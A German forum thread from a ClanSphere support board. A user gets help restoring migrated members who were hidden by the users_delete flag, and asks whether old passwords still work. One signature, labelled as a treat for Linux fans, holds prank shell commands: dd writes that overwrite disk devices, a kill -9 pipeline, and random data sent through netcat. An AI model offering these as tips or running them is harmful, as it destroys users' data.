Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 8
Seite [1]
Marckrele


Try to beat me




Herkunft: H-U
Beiträge: 180
# Thema - 17.09.2010 um 23:21 Uhr
Hi,

ich wollte die Benutzer-Datenbank _users (bzw. einen Teil davon) von einer hp auf eine andere transferieren.

Bei phpmyadmin scheint es funktioniert zu haben, die User stehen in der mysql-Datenbank. Auf der hp finde ich sie jedoch nicht gelistet.

Bisher hab ich die _users kopiert. Muß ich noch andere _xy kopieren? Was muß ich noch machen/kopieren, damit die Benutzer auf der anderen hp gelistet werden?

Grüße


------------------
Ohne Ordnung wird jedes Universum im Chaos verglühen, und ohne Chaos wird jedes Universum in Ordnung erstarren.
Sind sie nicht aufeinander angewiesen?
Ruumaytron PR Nr. 2382

Inaktiv
Jam2 ClanSphere Team


Highlander





Beiträge: 3291
# Antwort: 1 - 18.09.2010 um 07:20 Uhr
CSP Versionen?


------------------
Gruß/ Best regards
Jam2

Nützliche Forumbeiträge/Codepastes: (Useful comments in our board / codepastes)
Template Switch for index.php
Board Navlist last posts

Edi: könnte man denn auch hier eine erweiterung einfügen?
Jam2: das web ist wie toyota.....
Edi: hö ?
Jam2: nichts ist unmöglich!


Inaktiv
|
Marckrele
Thread-Ersteller


Try to beat me




Herkunft: H-U
Beiträge: 180
# Antwort: 2 - 18.09.2010 um 08:36 Uhr
´Tschulidgung , genutzte csp-Versionen sind 2010.0 .

Die Datenbank-Export-Funktion unter System hab ich auch versucht. Hab {pre} nicht verändert und als Datei ex und auf der anderen importiert, kein sichtbarer Erfolg.


------------------
Ohne Ordnung wird jedes Universum im Chaos verglühen, und ohne Chaos wird jedes Universum in Ordnung erstarren.
Sind sie nicht aufeinander angewiesen?
Ruumaytron PR Nr. 2382



Inaktiv
|
Marckrele
Thread-Ersteller


Try to beat me




Herkunft: H-U
Beiträge: 180
# Antwort: 3 - 28.09.2010 um 19:41 Uhr
weiß denn keiner einen Rat? :(


------------------
Ohne Ordnung wird jedes Universum im Chaos verglühen, und ohne Chaos wird jedes Universum in Ordnung erstarren.
Sind sie nicht aufeinander angewiesen?
Ruumaytron PR Nr. 2382



Inaktiv
|
gent0s


Try to beat me




Beiträge: 138
# Antwort: 4 - 23.10.2010 um 16:46 Uhr
Also bei mir hat es über die Clansphere Export Funktion geklappt. Ich hatte nämlich noch eine ältere version von clansphere (2009) und wollte nun die version auf 2001.0 updaten. Bei mir hat es geklappt indem ich als Präfix das {pre} in "cs" geändert habe (ohne anführungszeichen), da die standartpräfix bei clansphere ja cs ist. Von 19 Usern konnte ich 18 rüber importiern wobei ich nicht verstehe warum ich den einen User nicht rüber portieren konnte.

Desweiteren wollte ich auch die Foreneinträge, Gästebucheinträge, Kategorien, Kommentare usw rüber exportieren, jedoch hat das auch immer nur zum teil geklappt und jetzt frage ich mich warum sich nur manche datenbankensätze rüber exportieren lassen? Kann mir da jemand einen Rat geben?


------------------


Inaktiv
|
Marckrele
Thread-Ersteller


Try to beat me




Herkunft: H-U
Beiträge: 180
# Antwort: 5 - 21.12.2010 um 13:24 Uhr
mal ne andere ( späte) Frage: wenn user in der mqsl-db drinstehen ( lt. phpmyadmin), aber nicht unter user bzw. member im csp ( v. 2010.2) angezeigt werden: woran kann das liegen und wie kann ich das handhaben?

Grüße


------------------
Ohne Ordnung wird jedes Universum im Chaos verglühen, und ohne Chaos wird jedes Universum in Ordnung erstarren.
Sind sie nicht aufeinander angewiesen?
Ruumaytron PR Nr. 2382



Inaktiv
|
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 6 - 21.12.2010 um 13:26 Uhr
Es könnte daran liegen, dass die spalte users_delete auf 1 gesetzt ist, also der User in Clansphere gelöscht wurde, aber in der Datenbank aus Konistenzgründen noch existiert.


------------------
www.laszlokorte.de

Inaktiv
|
Marckrele
Thread-Ersteller


Try to beat me




Herkunft: H-U
Beiträge: 180
# Antwort: 7 - 21.12.2010 um 14:04 Uhr
Danke für die Antwort
hm, kann ich das iwie wieder hin gebogen bekommen, dass sie wieder sichtbar werden, die "Löschung" quasi rückgängig machen?
Weil wenn, dann war es mein Fehler. Ich glaube nicht, bzw. ich weiß, dass es nicht die User waren, die sich gelöscht/ deaktiviert haben.

Wenn ja wie bekomme ich das wieder hin?


lol, hast du ja geschrieben.
Mann, das ist mühsam, Gott sei dank bloß ´ne Gildenseite ^^. War doch nicht so müsam, man sollte sich auch durchlesen, was phpmyadmin an werten ausspuckt :/ .Nur doof, dass ich sie als Mitglieder wieder den jeweiligen Gruppen zuordnen muss .

Wenn ich sie in der db von user_delete 1 auf 0 gesetzt habe: Ihre alten Passwörter sind dann aber trotzdem noch gültig, oder? Oder muß ich ihnen dann noch die Passwörter ändern/ändern lassen?

Grüße


------------------
Ohne Ordnung wird jedes Universum im Chaos verglühen, und ohne Chaos wird jedes Universum in Ordnung erstarren.
Sind sie nicht aufeinander angewiesen?
Ruumaytron PR Nr. 2382



Zuletzt editiert von Marckrele am 21.12.2010 um 16:38 Uhr (2x Editiert)
Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 8 - 26.12.2010 um 21:02 Uhr
Wenn du bei der Installtion darauf gechtet hast dass die Kodierung bei dem Passwort identisch ist, dann sollten die alten Passwörter weiterhin funktionieren.

Wenn du bei der alten CSP Installation md5 angegeben hast, und dann bei der neuen Installation sha1 verwendest, dann benötigen die Benutzer ein neues Passwort, welches sie sich aber über die Passwort vergessen Funktion zuschicken lassen können.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Antworten: 8
Seite [1]


Sie müssen sich registrieren, um zu antworten.